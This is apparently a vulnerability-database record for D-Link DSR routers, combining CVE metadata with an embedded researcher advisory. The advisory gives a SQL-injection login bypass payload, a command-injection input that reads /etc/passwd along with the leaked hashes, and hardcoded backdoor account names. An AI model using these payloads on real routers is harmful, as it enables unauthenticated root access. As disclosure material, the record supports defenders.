        "version": null
      },
      {
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-1000",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-1000n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-150",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-150n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-250",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-250n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-500",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dsr-500n",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64462"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-7004",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-7004",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15548",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-67006",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7004",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7004",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15548",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-400",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67006",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username. Firmware for multiple D-Link router products contains a hard-coded account with the user name gkJ9232xXyruTRmY, which allows access rights to be obtained. A third party may obtain access rights by using knowledge of the user name. D-Link DSR is a wireless service router product developed by D-Link. D-Link DSR Router Series are prone to a security-bypass vulnerability. A trust management vulnerability exists in several D-Link products. The vulnerability stems from the fact that the program has a hard-coded user account named \u0027gkJ9232xXyruTRmY\u0027. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7004",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 2.3
      },
      {
        "db": "BID",
        "id": "64462",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "id": "VAR-201312-0289",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      }
    ],
    "trust": 0.06999999999999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:08:28.175000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Services Routers",
        "trust": 0.8,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
        "trust": 0.8,
        "url": "http://www.dlink-jp.com/router-firewall"
      },
      {
        "title": "Downloads",
        "trust": 0.8,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "title": "D-Link DSR Router built-in account vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/41959"
      },
      {
        "title": "DSR-250N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47082"
      },
      {
        "title": "DSR-250_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47081"
      },
      {
        "title": "DSR-150N_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47080"
      },
      {
        "title": "DSR-150_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47079"
      },
      {
        "title": "DSR-150_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47078"
      },
      {
        "title": "DSR-1000_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47085"
      },
      {
        "title": "DSR-500N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47084"
      },
      {
        "title": "DSR-500_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47083"
      },
      {
        "title": "DSR-1000N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47086"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-255",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7004"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7004"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "db": "BID",
        "id": "64462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "BID",
        "id": "64462"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "date": "2013-12-19T04:24:57.463000",
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15548"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67006"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "BID",
        "id": "64462"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      },
      {
        "date": "2024-11-21T02:00:08.607000",
        "db": "NVD",
        "id": "CVE-2013-7004"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Vulnerability in multiple D-Link router product firmware that allows access rights to be obtained",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005615"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-400"
      }
    ],
    "trust": 0.6
  }
}

var-201312-0198
Vulnerability from variot

The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful exploitation can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions.

CVEs:

CVE-2013-5945 - Authentication Bypass by SQL-Injection

CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution

Vulnerable Routers:

D-Link DSR-150 (Firmware < v1.08B44)

D-Link DSR-150N (Firmware < v1.05B64)

D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)

D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)

D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)

Download URL:

http://tsd.dlink.com.tw

Arch:

mips and armv6l, Linux

Author:

0_o -- null_null

nu11.nu11 [at] yahoo.com

Date:

2013-08-18

Purpose:

Get a non-persistent root shell on your D-Link DSR.

Prerequisites:

Network access to the router ports 443 and 23.

!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!

A list of identified vulns follows. This list is not exhaustive as I assume

more vulns are present that just slipped my attention.

The fact that D-Link implemented a backdoor user (for what reason, please??)

and just renamed it instead of completely removing it after it was targeted

by my previous exploit, as well as the triviality of those vulns I found

makes me suggest that more vulns are present that are comparably easy to

exploit.

Since 2013-12-03, patches are available for:

DSR-150: Firmware v1.08B44

DSR-150N: Firmware v1.05B64

DSR-250 and DSR-250N: Firmware v1.08B44

DSR-500 and DSR-500N: Firmware v1.08B77

DSR-1000 and DSR-1000N: Firmware v1.08B77

via http://tsd.dlink.com.tw

And now, have a worthwhile read :-)

  1. Contents:

  2. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  3. Exposure: D-Link backdoor user
  4. Vulnerability: Use of weak hash algorithms
  5. Exposure: Passwords are stored as plain text in config files
  6. Vulnerability: Bad permissions on /etc/shadow

  Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  • Possible via the global webUI login form.

  • File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

-- Checks a submitted username/password pair against the given user table.
-- Parameters:
--   tablename  - name of the table to query; formatted into the SQL text
--   tableInput - table of submitted fields; "Users.UserName" and
--                "Users.Password" are read from it
-- Returns:
--   result     - true when the query yields a row, false otherwise
--   statusCode - "USER_LOGIN_INVALID_PASSWORD" when the query ran but
--                returned no row, otherwise "NONE"
function login.authenticate(tablename, tableInput)
    local username = tableInput["Users.UserName"]
    local password = tableInput["Users.Password"]
    -- NOTE(review): username and password are placed into the statement text
    -- by string.format with no escaping and no bound parameters, so a quote
    -- character in either field changes the structure of the query. This is
    -- the defect tracked as CVE-2013-5945. The remedy is to bind both values
    -- as parameters (or escape them) instead of formatting them into the SQL.
    -- The submitted password is also compared directly with the Password column.
    local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password))
    local result = false
    local statusCode = "NONE"
    -- When db.execute returns no cursor, the function reports (false, "NONE").
    if cur then
        local row = cur:fetch({}, "a")
        cur:close()
        -- Any returned row counts as a successful login.
        result = row ~= nil
        if result == false then
            statusCode = "USER_LOGIN_INVALID_PASSWORD"
        end
    end
    return result, statusCode
end

  • This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

  • Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin password = ' or 'a'='a

  • ...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

  • Old school SQL injection. Ohh, by the way...

  • The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --

2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)

  • File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. Tools like curl are not hindered by these checks.

  • All forms allow input like this:

localhost;

example:

localhost;cat /etc/passwd

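  • This user-provided value is then used directly as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section. Because the value reaches the shell unvalidated, the fix belongs on the server side: accept only a well-formed IP address or host name and run the tool without passing the string through a shell.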

  • Output from user provided commands gets displayed on the next page beneath the benign command output.

example:

[...]
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]

3. Exposure: D-Link backdoor user:

  * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

  * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one.

  * I verified this by showing the /etc/profile:

# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '

4. Vulnerability: Use of weak hash algorithms:

  * In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet.

  * An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password.

5. 
Exposure: Passwords are stored as plain text in config files: * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example: [...] Users = {} Users[1] = {} Users[1]["Capabilities"] = "" Users[1]["DefaultUser"] = "1" Users[1]["UserId"] = "1" Users[1]["FirstName"] = "backdoor" Users[1]["OID"] = "0" Users[1]["GroupId"] = "1" Users[1]["UserName"] = "gkJ9232xXyruTRmY" Users[1]["Password"] = "thisobviouslyisafakepass" Users[1]["UserTimeOut"] = "10" Users[1]["_ROWID_"] = "1" Users[1]["LastName"] = "ssl" [...] 6. Vulnerability: Bad permissions on /etc/shadow * This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway. DSR-250N> ls -l -a /etc/shadow -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow DSR-250N> ps PID USER VSZ STAT COMMAND 1 root 2700 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 8 root 0 SW< [async/mgr] 111 root 0 SW< [kblockd/0] 120 root 0 SW< [khubd] 123 root 0 SW< [kseriod] 128 root 0 SW< [kslowd] 129 root 0 SW< [kslowd] 150 root 0 SW [pdflush] 151 root 0 SW [pdflush] 152 root 0 SW< [kswapd0] 200 root 0 SW< [aio/0] 210 root 0 SW< [nfsiod] 220 root 0 SW< [crypto/0] 230 root 0 SW< [cns3xxx_spi.0] 781 root 0 SW< [mtdblockd] 860 root 0 SW< [usbhid_resumer] 874 root 0 SW< [rpciod/0] 903 root 0 SWN [jffs2_gcd_mtd4] 909 root 0 SWN [jffs2_gcd_mtd5] 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db 1049 root 2704 S /usr/sbin/telnetd -l /bin/login 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd 1141 root 37000 S /pfrm2.0/bin/sshd 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5 1255 root 3148 
